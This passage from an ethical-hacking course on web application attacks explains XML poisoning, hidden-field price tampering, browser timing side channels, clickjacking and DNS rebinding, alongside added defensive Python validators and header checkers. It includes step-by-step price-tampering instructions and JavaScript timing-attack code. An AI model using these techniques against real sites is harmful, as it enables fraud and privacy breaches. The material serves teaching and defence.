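    services = []
    for info in body.iter(f"{{{UDDI_NS}}}serviceInfo"):
        name_el = info.find(f"{{{UDDI_NS}}}name")
        services.append({
            "serviceKey": info.get("serviceKey", ""),
            "businessKey": info.get("businessKey", ""),
            "name": name_el.text.strip() if name_el is not None and name_el.text else "",
        })
    return services


def is_truncated(xml_text: str) -> bool:
    """True when the registry signalled that more matches exist than it returned,
    i.e. the inventory is incomplete and the query must be narrowed or paged."""
    root = ET.fromstring(xml_text)
    sl = root.find(f".//{{{UDDI_NS}}}serviceList")
    return sl is not None and sl.get("truncated", "false").lower() == "true"


if __name__ == "__main__":
    print(build_find_service("amazon"))
    for svc in parse_service_list(SAMPLE_RESPONSE):
        print(f'{svc["serviceKey"]}  {svc["businessKey"]}  {svc["name"]}')
```

Run against a real registry reply, the list of (businessKey, serviceKey, name) tuples is the set of bindingTemplates an outsider can walk; anything in it that is no longer meant to be public is a finding to remove from the registry.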


Web Service XML Poisoning


XML poisoning is similar to an SQL injection attack. It has a higher success rate in a web service
framework. Attackers insert malicious XML code in SOAP requests to perform XML node
manipulation or XML schema poisoning to generate errors in XML parsing logic and break
execution logic. Attackers can manipulate XML external entity references that can lead to
arbitrary file or TCP connection openings, which can be exploited for other web service attacks.
XML poisoning enables attackers to perform a DoS attack and compromise confidential
information. As web services are invoked using XML documents, attackers poison the traffic
between the server and browser applications by creating malicious XML documents to alter
parsing mechanisms such as SAX and DOM, which web applications use on the server.

XML Request
<CustomerRecord>
<CustomerNumber>2010</CustomerNumber>
<FirstName>Jason</FirstName>
<LastName>Springfield</LastName>
<Address>Apt 20, 3rd Street</Address>
<Email>jason@springfield.com</Email>
<PhoneNumber>6325896325</PhoneNumber>
</CustomerRecord>

Poisoned XML Request
<CustomerRecord>
<CustomerNumber>2010</CustomerNumber>
<FirstName>Jason</FirstName><CustomerNumber>
2010</CustomerNumber>
<FirstName>Jason</FirstName>
<LastName>Springfield</LastName>
<Address>Apt 20, 3rd Street</Address>
<Email>jason@springfield.com</Email>
<PhoneNumber>6325896325</PhoneNumber>
</CustomerRecord>
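The poisoned record above is well-formed XML, so a parser that simply walks the tree accepts it and the application ends up with two CustomerNumber and two FirstName nodes, whichever one the code happens to read. The check a service should make is structural: every expected element exactly once, nothing unexpected, and no DTD at all (the DOCTYPE is where external entity references are declared). The following Python validator is an added example, not code from the original material; it embeds the normal and poisoned records from the text plus one constructed record carrying a harmless internal DTD, and uses only the standard library.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat

# Child elements a CustomerRecord must carry exactly once.
EXPECTED_CHILDREN = ("CustomerNumber", "FirstName", "LastName",
                     "Address", "Email", "PhoneNumber")

# The two records from the text, embedded as test input.
NORMAL_RECORD = """<CustomerRecord>
<CustomerNumber>2010</CustomerNumber>
<FirstName>Jason</FirstName>
<LastName>Springfield</LastName>
<Address>Apt 20, 3rd Street</Address>
<Email>jason@springfield.com</Email>
<PhoneNumber>6325896325</PhoneNumber>
</CustomerRecord>"""

POISONED_RECORD = """<CustomerRecord>
<CustomerNumber>2010</CustomerNumber>
<FirstName>Jason</FirstName><CustomerNumber>
2010</CustomerNumber>
<FirstName>Jason</FirstName>
<LastName>Springfield</LastName>
<Address>Apt 20, 3rd Street</Address>
<Email>jason@springfield.com</Email>
<PhoneNumber>6325896325</PhoneNumber>
</CustomerRecord>"""

# Constructed: the same record prefixed with a DTD. A data endpoint never needs
# one, and a DTD is the only place entity references can be declared.
DTD_RECORD = '<!DOCTYPE CustomerRecord [<!ENTITY x "y">]>' + NORMAL_RECORD


def has_doctype(doc: str) -> bool:
    """Report whether the document declares a DTD, without expanding anything.

    expat fires StartDoctypeDeclHandler as soon as it sees the declaration,
    before any entity in the body is touched."""
    seen = []
    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = (
        lambda name, sysid, pubid, has_internal: seen.append(name))
    try:
        parser.Parse(doc, True)
    except expat.ExpatError:
        pass  # a malformed document is rejected by the caller anyway
    return bool(seen)


def validate_customer_record(doc: str) -> list[str]:
    """Return a list of problems; an empty list means the record has exactly
    the expected shape. Duplicate nodes, missing nodes, foreign nodes and any
    DTD are all rejected instead of being silently tolerated."""
    if has_doctype(doc):
        return ["DOCTYPE declaration present; refusing to process"]
    try:
        root = ET.fromstring(doc)
    except ET.ParseError as exc:
        return [f"malformed XML: {exc}"]
    problems = []
    if root.tag != "CustomerRecord":
        problems.append(f"unexpected root element {root.tag}")
    counts: dict[str, int] = {}
    for child in root:
        counts[child.tag] = counts.get(child.tag, 0) + 1
    for tag in EXPECTED_CHILDREN:
        n = counts.get(tag, 0)
        if n != 1:
            problems.append(f"{tag} appears {n} times, expected exactly 1")
    for tag in counts:
        if tag not in EXPECTED_CHILDREN:
            problems.append(f"unexpected element {tag}")
    return problems


if __name__ == "__main__":
    for label, rec in (("normal", NORMAL_RECORD), ("poisoned", POISONED_RECORD),
                       ("dtd", DTD_RECORD)):
        print(label, validate_customer_record(rec) or "OK")
```

In production the same exactly-once rule is what an XSD with maxOccurs="1" enforces when the parser validates against it; the point of writing it out is that validation must be turned on, since a default SAX or DOM parse of the poisoned request succeeds.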

Hidden Field Manipulation Attack

HTML Code
<form method="post" action="page.aspx">
<input type="hidden" name="PRICE" value="200.00">
Product name: <input type="text" name="product" value="Certifiedhacker Shirt"><br>
Product price: 200.00<br>
<input type="submit" value="submit">
</form>

Rendered form
Product Name: Certifiedhacker Shirt
Product Price: 200
Hidden field: Price = 200.00

Normal Request
http://www.certifiedhacker.com/page.aspx?product=Certifiedhacker%20Shirt&price=200.00

Attack Request
http://www.certifiedhacker.com/page.aspx?product=Certifiedhacker%20Shirt&price=2.00


Hidden Field Manipulation Attack


Attackers carry out hidden field manipulation attacks against e-commerce websites, as most of
these sites have hidden fields in their price and discount specifications. In every client session,
developers use hidden fields to store client information, including product prices and discount
rates. During the development of such programs, developers feel that all their applications are
safe; however, hackers can manipulate the product prices and even complete transactions with
the altered prices. When a user makes selections on an HTML page, the selection is typically
stored as form field values and sent to the application as an HTTP request (GET or POST). HTML
can also store field values as hidden fields, which are not rendered on the screen by the
browser but collected and submitted as parameters during form submissions. Attackers can
examine the HTML code of the page and change the hidden field values to change post
requests to the server.
Example

A particular mobile phone might be offered for $1000 on an e-commerce website, but the
hacker, by altering some of the hidden text in its price field, purchases it for only $10.
Such attacks result in severe losses for website owners, even though they might be using the
latest anti-virus software, firewalls, IDS, and so on to protect their networks from attacks.
Besides financial losses, the owners can also lose their market credibility. An example of such
code is given below:
<form method="post" action="page.aspx">
<input type="hidden" name="PRICE" value="200.00">
Product name: <input type="text" name="product" value="Certifiedhacker Shirt"><br>
Product price: 200.00<br>
<input type="submit" value="submit">
</form>
1. Open the HTML page within an HTML editor.
2. Locate the hidden field (e.g., "<type=hidden name=price value=200.00>").
3. Modify its content to a different value (e.g., "<type=hidden name=price value=2.00>").
4. Save the HTML file locally and browse it.
5. Click the Buy button to perform electronic shoplifting via hidden field manipulation.
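The root cause in the form above is that the server reads the price back from a field the client controls. The fix is not to hide the field better but to stop using it: the server resolves the price from its own catalogue by product identifier and, at most, treats a mismatching client value as a tamper signal to log. The following Python shows the trusting checkout beside the hardened one; it is an added example, not code from the original material, and the catalogue, form dictionaries and function names are constructed for illustration.

```python
from decimal import Decimal

# Constructed server-side catalogue: the only source of truth for prices.
CATALOG = {
    "Certifiedhacker Shirt": Decimal("200.00"),
}

# Constructed form submissions matching the normal and attack requests above.
NORMAL_FORM = {"product": "Certifiedhacker Shirt", "PRICE": "200.00"}
TAMPERED_FORM = {"product": "Certifiedhacker Shirt", "PRICE": "2.00"}


def vulnerable_checkout(form: dict) -> Decimal:
    """Trusts the hidden PRICE field exactly as the form in the text does,
    so whatever value the client posts becomes the amount charged."""
    qty = int(form.get("quantity", "1"))
    return Decimal(form["PRICE"]) * qty


def hardened_checkout(form: dict) -> Decimal:
    """Ignores any client-supplied price and resolves it from the catalogue.

    Unknown products and non-positive quantities are rejected rather than
    defaulted, so the client cannot steer the calculation through those
    fields either."""
    product = form.get("product", "")
    if product not in CATALOG:
        raise ValueError(f"unknown product: {product!r}")
    qty = int(form.get("quantity", "1"))
    if qty <= 0:
        raise ValueError("quantity must be positive")
    return CATALOG[product] * qty


def price_tamper_detected(form: dict) -> bool:
    """True if the client sent a PRICE that disagrees with the catalogue.

    The hardened path never uses the field, but a mismatch is a reliable
    indicator of a manipulated request and belongs in the application log."""
    product = form.get("product", "")
    if "PRICE" not in form or product not in CATALOG:
        return False
    try:
        return Decimal(form["PRICE"]) != CATALOG[product]
    except ArithmeticError:  # Decimal("abc") raises InvalidOperation
        return True


if __name__ == "__main__":
    print("vulnerable charges:", vulnerable_checkout(TAMPERED_FORM))
    print("hardened charges:  ", hardened_checkout(TAMPERED_FORM))
    print("tamper detected:   ", price_tamper_detected(TAMPERED_FORM))
```

The same rule applies to discount rates, shipping options and any other value the page describes as kept in a hidden field: if the server needs it, the server already has it and should look it up by key.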


Web-based Timing Attacks


A web-based timing attack is a type of side-channel attack performed by attackers to retrieve
sensitive information such as passwords from web applications by measuring the response time
taken by the server. These attacks exploit side-channel leakage and estimate the amount of
time taken for secret key operations. Different types of web-based timing attacks include direct
timing attacks, cross-site timing attacks, and browser-based timing attacks.
■ Direct Timing Attack
Direct timing attacks are carried out by measuring the approximate time taken by the
server to process a POST request, through which attackers can deduce the existence of a
username. Similarly, attackers perform character by character password examination
and exploit the timing information to determine the position where the password
comparison failed. Then, attackers use this data to determine the target user's
password.
■ Cross-site Timing Attack
A cross-site timing attack is another type of timing attack, in which attackers send
crafted request packets to the website using JavaScript, unlike a direct timing attack,
where the attacker himself/herself passes the request to a website. The attacker then
analyzes the time consumed by the user to download the requested file.
For instance, consider a website http://xyz.com that contains two separate groups such
as /the-prompt/ and /the-anonymous-place/, and only the group members have access
to the data fed into these groups. If any other person tries to access the group, an error
message is generated. Now, when a user accesses an unknown website that contains

malicious JavaScript injected by the attacker, the attacker can find out which group the
user belongs to and thus violate his/her privacy.
Sample JavaScript code used to perform this attack:
function getMeasurement(url, callback) {
    var a = new Image();
    // The resource is not an image, so the load fails; the error event fires
    // only after the download has finished, so the elapsed time is the
    // cross-site download time of the response.
    a.addEventListener('error', function() {
        var conclude = performance.now();
        callback(conclude - begin);
    });
    var begin = performance.now();
    a.src = url;
}

getMeasurement('http://xyz.com/the-prompt/', function(timeTF) {
    getMeasurement('http://xyz.com/the-anonymous-place', function(timeTDS) {
        if (timeTF > timeTDS) {
            alert('The prompt is alright!');
        } else {
            alert('Privacy breach!');
        }
    });
});

■ Browser-based Timing Attacks


Browser-based timing attacks are sophisticated side-channel attacks. Rather than
depending on the unsteady download time, attackers take advantage of side-channel
leaks of a browser to estimate the time taken by the browser to process the requested
resources. In this case, the time estimation begins immediately after the download of a
resource and ceases once the processing is done.
Attackers can abuse different browser functionalities to launch further attacks such as
video parsing attacks and cache storage timing attacks.
o Video-parsing Attack
Sample JavaScript code used to perform this attack:
function getMeasurement(url, callback) {
    var p = document.createElement('video');
    var begin;
    // 'suspend' fires once the download has stopped, so timing starts only
    // after the network transfer is out of the measurement.
    p.addEventListener('suspend', function() {
        begin = performance.now();
    });
    // 'error' fires after the browser has tried, and failed, to parse the
    // resource as a video; the gap is the in-browser processing time.
    p.addEventListener('error', function() {
        var conclude = performance.now();
        callback(conclude - begin);
    });
    p.src = url;
}

In contrast to cross-site timing attacks, here, the estimation time begins when the
event "suspend" is triggered . The event is usually triggered when the resource
downloading is stopped, as the requested resource is not an intended video; it is
only a double- or triple-digit KB file. The event is also triggered when the resource
download is completed. Subsequently, the browser attempts to parse the requested
resource as a video. Certainly, the files HTML/JSON/ ... are invalid video formats;
hence, the browser will raise an "error" event. Here, the attacker observes the
amount of time the browser takes to process the resource and generate an error
event. Single estimation for every end point might not always serve the purpose.
Therefore, attackers try to accumulate several time estimations and calculate the
median or average.
o Cache Storage Timing Attack
The Cache API interface (used to load, fetch, and delete any responses) offers
complete cache (memory) to the developers. Loading resources in the disk takes
some amount of time based on the resource size. If attackers can estimate the time
taken by the browser to perform this task, they can measure the corresponding
response size.
Sample JavaScript code used to perform this attack:
function getMeasurement(url, callback) {
    fetch(url, {mode: "no-cors", credentials: "include"}).then(function(resp) {
        // Wait until the response is fully downloaded before timing anything.
        setTimeout(function() {
            caches.open('attackerfile').then(function(cache) {
                // Only the cache write is timed; its duration grows with the
                // size of the response being stored.
                var begin = performance.now();
                cache.put(new Request('myfoo'), resp.clone()).then(function() {
                    var conclude = performance.now();
                    callback(conclude - begin);
                });
            });
        }, 2000);
    });
}

After estimating or measuring the processing time using the abovementioned techniques,
attackers can launch further attacks such as brute-force attacks to obtain complete
information.
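The direct timing attack described first in this section works because the server's password comparison stops at the first differing character and because an unknown username skips the hash check entirely, so the response time encodes both. The following Python shows the leaky comparison beside the constant-time one and a login routine that spends the same work on unknown users; it is an added example, not code from the original material, and the user store, salts and hashing parameters are constructed for illustration. The cross-site and browser-based variants are not addressed by server-side code; they are limited by not sending cookies on cross-site subresource requests (the SameSite cookie attribute) and by cross-origin isolation headers.

```python
import hashlib
import hmac
import os


def naive_compare(expected: str, supplied: str) -> tuple[bool, int]:
    """Early-exit comparison. Returns equality and how many characters were
    examined; that count is what an attacker infers from response time."""
    examined = 0
    if len(expected) != len(supplied):
        return False, examined
    for a, b in zip(expected, supplied):
        examined += 1
        if a != b:
            return False, examined
    return True, examined


def constant_time_compare(expected: str, supplied: str) -> bool:
    """hmac.compare_digest examines every byte regardless of where the first
    difference is, so the work done no longer depends on the secret."""
    return hmac.compare_digest(expected.encode(), supplied.encode())


def _hash(password: str, salt: bytes) -> bytes:
    """PBKDF2-HMAC-SHA256 with a constructed, deliberately modest iteration
    count so the example runs quickly."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 50_000)


# Constructed user store: username -> (salt, hash). A dummy entry with a random
# salt is kept so that unknown users cost the same hashing work as known ones.
_DUMMY_SALT = os.urandom(16)
_DUMMY_HASH = _hash("not-a-real-password", _DUMMY_SALT)
_ALICE_SALT = b"fixed-salt-for-example"
USERS = {"alice": (_ALICE_SALT, _hash("correct horse", _ALICE_SALT))}


def login(username: str, password: str) -> bool:
    """Authenticate without a username-existence side channel.

    An unknown user still goes through a full PBKDF2 derivation and a
    constant-time comparison against the dummy hash, and the final decision
    is only made after that work has been done."""
    salt, stored = USERS.get(username, (_DUMMY_SALT, _DUMMY_HASH))
    candidate = _hash(password, salt)
    matches = hmac.compare_digest(candidate, stored)
    return matches and username in USERS


if __name__ == "__main__":
    print(naive_compare("secret", "sXXXXX"))       # (False, 2): stopped early
    print(naive_compare("secret", "secreX"))       # (False, 6): ran to the end
    print(constant_time_compare("secret", "sXXXXX"))
    print(login("alice", "correct horse"), login("nobody", "anything"))
```

Comparing hashes rather than raw passwords already removes most of the character-position leak, because a one-character change in the password changes every byte of the hash; the constant-time comparison closes what remains, and the dummy derivation closes the username oracle.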


MarioNet Attack
MarioNet is a browser-based attack that runs malicious code inside the browser, and the
infection persists even after closing or browsing away from the malicious web page through
which the infection has spread. Most of the latest web browsers support a new API called
Service Workers that allows the website to isolate operations that render the web page UI from
intensive computational tasks to avoid freezing of the UI when large amounts of data are
processed.
Attackers register and activate the Service Workers API through a website controlled by them.
When the victim browses that website, the Service Workers API automatically activates, and it
can run persistently in the background even when the user is not actively browsing the website.
To keep the Service Workers API alive, attackers abuse the Service Workers SyncManager
interface.
Therefore, MarioNet can resist any tab crashes and power failures, increasing the attacker's
potential to attack the browser. MarioNet leverages the abilities of JavaScript and depends on
previously available HTML5 APIs. It can be used to create a botnet and launch other malicious
attacks such as cryptojacking, DDoS, click fraud, and distributed password cracking.
Furthermore, this attack allows attackers to inject malicious code into high-traffic websites for a
short period, retrieve sensitive information such as user credentials, and then control the
abused browsers from a central server.

[Figure: the web browser (blocking extensions, webpage rendering, service worker) fetches the webpage from the web server; the service worker persists in the background and keeps a communication channel open to the attacker's remote C&C]

Figure 14.39: Illustration of MarioNet attack


Clickjacking Attack
A clickjacking attack is performed when the target website is loaded into an iframe element
that is masked with a web page element that appears legitimate. The attacker performs this
attack by tricking the victim into clicking on any malicious web page element that is placed
transparently on the top of any trusted web page. Clickjacking is not a single technique;
attackers leverage various attack vectors and techniques called UI redress attacks. They
perform such attacks by exploiting the vulnerabilities caused by HTML iframes or improper
configuration of the X-Frame-Options header. There are several variations of clickjacking
attacks such as likejacking and cursorjacking. To perform these attacks, attackers send a link to
the malicious website to the victim through email, social media, or any other media.
In clickjacking, the attacker loads the target website inside a low opacity iframe. Then, the
attacker designs a page such that all the clickable items such as buttons are positioned exactly
as on the selected target website. Now, the victim is tricked into clicking on the invisible
controls or the deceptive UI elements that automatically trigger various malicious actions such
as injecting malware, retrieving malicious web pages, retrieving sensitive information such as
credit card details, transferring money from the victim's account, and buying products online.
The various clickjacking techniques employed by attackers are listed below:
■ Complete transparent overlay: In this technique, the transparent, legitimate page or
tool page is overlaid on the previously designed malicious page. Then, it is loaded into
an invisible iframe and the higher z-index value is assigned for positioning it on top.
■ Cropping: In this technique, only the selected controls from the transparent page are
overlaid. This technique depends on the goal of the attack and may involve masking
buttons with hyperlinks and text labels with false information, changing the button
labels with wrong commands, and completely covering the legitimate page with
misleading information while exposing only one original button.
■ Hidden overlay: In this technique, the attacker creates an iframe of 1x1 pixels
containing malicious content placed secretly under the mouse cursor. When the user
clicks on this cursor, it will be registered on the malicious page although the malicious
content is concealed by the cursor.
■ Click event dropping: This technique can completely hide a malicious page behind a
legitimate page. It can also be used to set the CSS pointer-events property of the top to
none. This can cause click events to "drop" through the legitimate masked page and
registers only the malicious page.
■ Rapid content replacement: In this technique, the targeted controls are covered by
opaque overlays that are removed only for a moment for registering a click. An attacker
using this technique needs to accurately predict the time taken by the victim to click on
the web page.
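Every variant above depends on the target page being loadable inside a frame on an origin the attacker controls, which is exactly what the X-Frame-Options header and the CSP frame-ancestors directive mentioned earlier deny. Auditing a site therefore comes down to reading those two headers correctly, including the precedence rule (a browser that understands frame-ancestors ignores X-Frame-Options when both are present) and the obsolete ALLOW-FROM form. The following Python classifier is an added example, not code from the original material; the header dictionaries it is exercised with are constructed, and the function names are my own.

```python
def _csp_frame_ancestors(csp: str):
    """Return the lowercased source list of the frame-ancestors directive,
    or None when the policy does not contain the directive at all."""
    for directive in csp.split(";"):
        parts = directive.strip().split()
        if parts and parts[0].lower() == "frame-ancestors":
            return [p.lower() for p in parts[1:]]
    return None


def evaluate_framing_protection(headers: dict) -> dict:
    """Classify a response's anti-framing posture.

    Returns {"protected": bool, "reason": str}. CSP frame-ancestors is
    evaluated first because browsers that support it ignore X-Frame-Options
    when both headers are present."""
    h = {k.lower(): v for k, v in headers.items()}
    ancestors = _csp_frame_ancestors(h.get("content-security-policy", ""))
    if ancestors is not None:
        if ancestors == ["'none'"]:
            return {"protected": True, "reason": "CSP frame-ancestors 'none'"}
        if ancestors == ["'self'"]:
            return {"protected": True, "reason": "CSP frame-ancestors 'self'"}
        if any(a in ("*", "http:", "https:") for a in ancestors):
            return {"protected": False,
                    "reason": "CSP frame-ancestors allows any origin"}
        return {"protected": True,
                "reason": "CSP frame-ancestors restricted to " + " ".join(ancestors)}
    xfo = h.get("x-frame-options", "").strip().upper()
    if xfo in ("DENY", "SAMEORIGIN"):
        return {"protected": True, "reason": f"X-Frame-Options {xfo}"}
    if xfo.startswith("ALLOW-FROM"):
        return {"protected": False,
                "reason": "X-Frame-Options ALLOW-FROM is obsolete and ignored by current browsers"}
    if xfo:
        return {"protected": False,
                "reason": f"unrecognised X-Frame-Options value {xfo!r}"}
    return {"protected": False, "reason": "no anti-framing header"}


def anti_framing_headers(allowed_ancestors=("'self'",)) -> dict:
    """Headers to add to every HTML response. Both are emitted because older
    browsers honour only X-Frame-Options."""
    xfo = "DENY" if tuple(allowed_ancestors) == ("'none'",) else "SAMEORIGIN"
    return {
        "Content-Security-Policy": "frame-ancestors " + " ".join(allowed_ancestors),
        "X-Frame-Options": xfo,
    }


if __name__ == "__main__":
    # Constructed header sets, one per posture.
    samples = {
        "unprotected": {},
        "xfo only": {"X-Frame-Options": "DENY"},
        "csp wins": {"Content-Security-Policy": "frame-ancestors *",
                     "X-Frame-Options": "DENY"},
        "recommended": anti_framing_headers(),
    }
    for label, hdrs in samples.items():
        print(f"{label:12} {evaluate_framing_protection(hdrs)}")
```

The "csp wins" case is the one most often missed in reviews: a page that sets X-Frame-Options: DENY but also ships a frame-ancestors * directive is frameable in every current browser.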

[Figure: the attacker overlays malicious web page elements on the attacker's website and sends the malicious website link via email ("Hi, You have won a lottery of $2M, click the link to claim it."); the victim opens the link in the browser, the victim's browser opens the target website, and the victim clicks a legitimate UI element and gets clickjacked]

Figure 14.40: Illustration of clickjacking attack


DNS Rebinding Attack


Attackers use the DNS rebinding technique to bypass the same-origin policy's security
constraints, allowing the malicious web page to communicate with or make arbitrary requests
to local domains. For instance, if a client is working for an organization, he/she mostly uses the
internal or private network. External resources cannot be accessed from inside that private
network due to the same-origin policy (SOP). Hence, attackers cannot directly communicate
with the local network due to restrictions in the SOP. Therefore, they use the DNS rebinding
technique to circumvent this SOP security implementation.
How DNS Rebinding Works

An attacker creates a malicious website with the domain name certifiedhacker.com and
registers it with the DNS server controlled by him/her. Now, the attacker configures the DNS
server to send DNS responses with very short TTL values to avoid caching of the responses.
Then, the attacker begins his/her intended operation with the HTTP server that contains the
malicious website http://certifiedhacker.com.
When the victim opens the malicious website, the attacker's DNS server sends the IP Address of
the HTTP server that hosts the attacker-controlled website http://certifiedhacker.com. The web
server responds with a page that runs JavaScript code in the victim's browser. Then, the
JavaScript code accesses the website on the domain http://certifiedhacker.com to get
additional resources from http://certifiedhacker.com/secret.html. When the browser runs the
JavaScript, it makes a DNS request for the domain (owing to the short TTL configuration), but
the attacker-controlled DNS server responds with a new IP. For instance, if the attacker-
controlled DNS server responds with the private or internal IP of xyz.com, the victim's browser
loads http://xyz.com/secret.html and not http://certifiedhacker.com/secret.html successfully by
bypassing the SOP.
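Two controls break the sequence described above at different points. A filtering resolver refuses to hand the browser a private address for a name outside the organization's own zones, so the second lookup never yields 10.10.10.2; this is the behaviour dnsmasq's stop-dns-rebind option provides. Independently, the internal service checks the Host header: after rebinding, the browser still sends the attacker's domain name as Host, which the internal server does not answer to. The following Python models both checks; it is an added example, not code from the original material, and the internal-zone suffix, allowed host names and the public address used are constructed for illustration.

```python
import ipaddress
from urllib.parse import urlsplit


def is_private_address(ip: str) -> bool:
    """True for loopback, link-local, RFC 1918, ULA and other non-global ranges,
    i.e. any address a public hostname has no business resolving to."""
    return not ipaddress.ip_address(ip).is_global


def resolver_allows(name: str, answer_ip: str,
                    internal_suffixes=(".corp.example",)) -> bool:
    """Policy for a filtering resolver: a name outside the internal zones must
    never resolve to a private address. Names inside those zones are exempt,
    because that is where private answers are legitimate."""
    name = name.rstrip(".").lower()
    if name.endswith(internal_suffixes):
        return True
    return not is_private_address(answer_ip)


def host_header_allowed(host_header: str, allowed_hosts: set[str]) -> bool:
    """An internal service should refuse requests whose Host header is not one
    of its own names. urlsplit handles ports and bracketed IPv6 literals."""
    host = urlsplit("//" + host_header.strip()).hostname
    if host is None:
        return False
    return host in {h.lower() for h in allowed_hosts}


def check_rebinding_sequence(name: str, answers: list[str]) -> list[str]:
    """Run the resolver policy over the successive answers a client would
    receive for one name and report which ones would be dropped."""
    return [ip for ip in answers if not resolver_allows(name, ip)]


if __name__ == "__main__":
    # Constructed: first answer a public address, second answer an internal one,
    # mirroring the two lookups of certifiedhacker.com in the text.
    print(check_rebinding_sequence("certifiedhacker.com",
                                   ["93.184.216.34", "10.10.10.2"]))
    print(host_header_allowed("certifiedhacker.com", {"xyz.corp.example"}))
    print(host_header_allowed("xyz.corp.example:8080", {"xyz.corp.example"}))
```

The resolver check protects every internal service at once but only for clients using that resolver; the Host header check protects one service everywhere, including for clients on a resolver the organization does not control. Deploying both is the usual recommendation, and TLS on the internal service adds a third layer, since the certificate will not match the attacker's name.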

Figure 14.41: Demonstration of DNS rebinding attack

Sequence between the victim's web browser and the malicious web server hosting the attacker's website http://certifiedhacker.com:
1. Victim's browser: load certifiedhacker.com
2. Browser to DNS: resolve certifiedhacker.com
3. DNS to browser: IP of certifiedhacker.com (short TTL) - 10.10.10.10
4. Browser to server: HTTP GET http://10.10.10.10/index.html
5. Server to browser: HTTP index.html embedded with JavaScript
6. Browser: run the script, which requests http://certifiedhacker.com/secret.html
7. Browser to DNS: resolve certifiedhacker.com (due to short TTL)
8. DNS to browser: IP of xyz.com - 10.10.10.2
9. Browser to 10.10.10.2: HTTP GET http://10.10.10.2/secret.html
10. 10.10.10.2 to browser: HTTP secret.html
11. The attacker has successfully bypassed SOP. Now, the script sends secret.html to the attacker.


Same-Site Attack
Same-site attacks, also known as related-domain attacks, occur when an attacker targets a subdomain of a trusted organization and attempts to redirect users to an attacker-controlled web page. Subdomains that are misconfigured or left for years without use are often targeted by attackers to perform this attack. Generally, the most familiar domains such as .edu, .com, and .org contain several perimeters that make it easy for attackers to capture unused or misconfigured subdomains sharing the legitimate site's top-level domains (TLDs). These TLDs help attackers in hijacking the legitimate websites to create dangling records using extended TLDs (eTLDs). Such websites sharing the same eTLD+1 domain are called same sites, which can be targeted by same-site attackers.
These attacks rely on the notion that identifying an external adversary is easier than spotting one that appears to come from inside the organization's own domain. The victims of these attacks are redirected to an attacker-controlled web page, which has the appearance of a secure, legitimate web page. The vulnerable subdomains can be compromised through phishing attacks, malware injection, cookie poisoning, abuse of JavaScript APIs, etc. Users who utilize dynamic DNS facilities are especially vulnerable to these attacks. Same-site attackers can also obtain cookies because sites that share the same eTLD+1 domain share cookies.
Same-Site Attack Scenario
In a same-site attack, the attacker redirects a user attempting to browse www.certifiedhacker.com to an attacker-controlled dangling site, rans.certifiedhacker.com. The malicious link shares a common domain name, which lures the user into believing that the redirected site is the secure or legitimate one. Then, the attacker can perform security policy intrusion, credential sniffing, phishing, and malware injection attacks by taking over subdomains.
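The cookie sharing that makes the scenario above dangerous can be checked in code. The following Python is an added example, not part of the EC-Council text: it applies RFC 6265 domain matching to the scenario's hosts, www.certifiedhacker.com and rans.certifiedhacker.com, to show which cookies a hijacked sibling subdomain would receive or could plant, and why host-only and __Host- cookies do not cross subdomains. The cookie set and the tiny public-suffix list are constructed for illustration (a real check would use the Public Suffix List).

```python
"""Cookie scoping in the same-site (related-domain) scenario described above.

Added example, not EC-Council's code. The hosts www.certifiedhacker.com and
rans.certifiedhacker.com come from the scenario; the cookies and the tiny
public-suffix set are constructed (a real check would use the Public Suffix List).
"""
from dataclasses import dataclass
from typing import List, Optional

# Constructed stand-in for the Public Suffix List: the registrable domain (eTLD+1)
# is one label below one of these, so "certifiedhacker.com" is the eTLD+1 here.
PUBLIC_SUFFIXES = {"com", "org", "edu"}


@dataclass(frozen=True)
class Cookie:
    name: str
    domain: Optional[str]  # Domain attribute, or None for a host-only cookie
    secure: bool = False
    http_only: bool = False
    path: str = "/"


def normalize(host: str) -> str:
    return host.strip().lower().strip(".")


def domain_matches(request_host: str, cookie_domain: str) -> bool:
    """RFC 6265 5.1.3: the host equals the domain or ends with '.' + domain."""
    host, dom = normalize(request_host), normalize(cookie_domain)
    return host == dom or host.endswith("." + dom)


def registrable_domain(host: str) -> Optional[str]:
    """The eTLD+1 of host under PUBLIC_SUFFIXES; None if host is a suffix itself
    or its suffix is unknown to this constructed list."""
    labels = normalize(host).split(".")
    for i in range(len(labels)):
        if ".".join(labels[i:]) in PUBLIC_SUFFIXES:
            return ".".join(labels[i - 1:]) if i > 0 else None
    return None


def can_set_domain(origin_host: str, cookie_domain: str) -> bool:
    """A browser accepts a Domain attribute only if it covers the setting host and
    is not a public suffix. Every host under one eTLD+1 therefore qualifies, which
    is what lets a hijacked subdomain plant cookies the legitimate site will read."""
    dom = normalize(cookie_domain)
    return dom not in PUBLIC_SUFFIXES and domain_matches(origin_host, dom)


def is_sent_to(cookie: Cookie, origin_host: str, request_host: str) -> bool:
    """Would a cookie set by origin_host be attached to a request for request_host?"""
    if cookie.domain is None:  # host-only: exact host match required
        return normalize(request_host) == normalize(origin_host)
    return domain_matches(request_host, cookie.domain)


def shared_with_related_domain(cookies: List[Cookie], origin_host: str,
                               related_host: str) -> List[str]:
    """Names of cookies set by origin_host that a sibling subdomain would receive."""
    return [c.name for c in cookies if is_sent_to(c, origin_host, related_host)]


def host_prefix_violations(cookies: List[Cookie]) -> List[str]:
    """__Host- cookies must be Secure, carry no Domain attribute and use Path=/;
    a compliant browser rejects any other __Host- cookie, so these can never be
    widened to the whole eTLD+1 by the server or by a sibling subdomain."""
    return [c.name for c in cookies
            if c.name.startswith("__Host-")
            and (not c.secure or c.domain is not None or c.path != "/")]


# Constructed: cookies as the legitimate site might set them.
SITE_COOKIES = [
    Cookie("sessionid", domain="certifiedhacker.com", secure=True, http_only=True),
    Cookie("prefs", domain=None),
    Cookie("__Host-sid", domain=None, secure=True, http_only=True),
]

if __name__ == "__main__":
    origin, related = "www.certifiedhacker.com", "rans.certifiedhacker.com"
    print("eTLD+1:", registrable_domain(origin))
    print("cookies", related, "receives:", shared_with_related_domain(SITE_COOKIES, origin, related))
    print("rans.* may set Domain=certifiedhacker.com:", can_set_domain(related, "certifiedhacker.com"))
    print("rans.* may set Domain=com:", can_set_domain(related, "com"))
```

Only the Domain-scoped sessionid reaches the sibling host; the host-only and __Host- cookies stay with www.certifiedhacker.com.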


Figure 14.42: Illustration of a same-site attack (the user browsing for the legitimate site www.certifiedhacker.com is redirected to the attacker's subdomain; both domains belong to certifiedhacker.com)


Pass-the-Cookie Attack
■ Pass-the-cookie attacks allow attackers to access a user's web services without providing any identity or performing multi-factor authentication
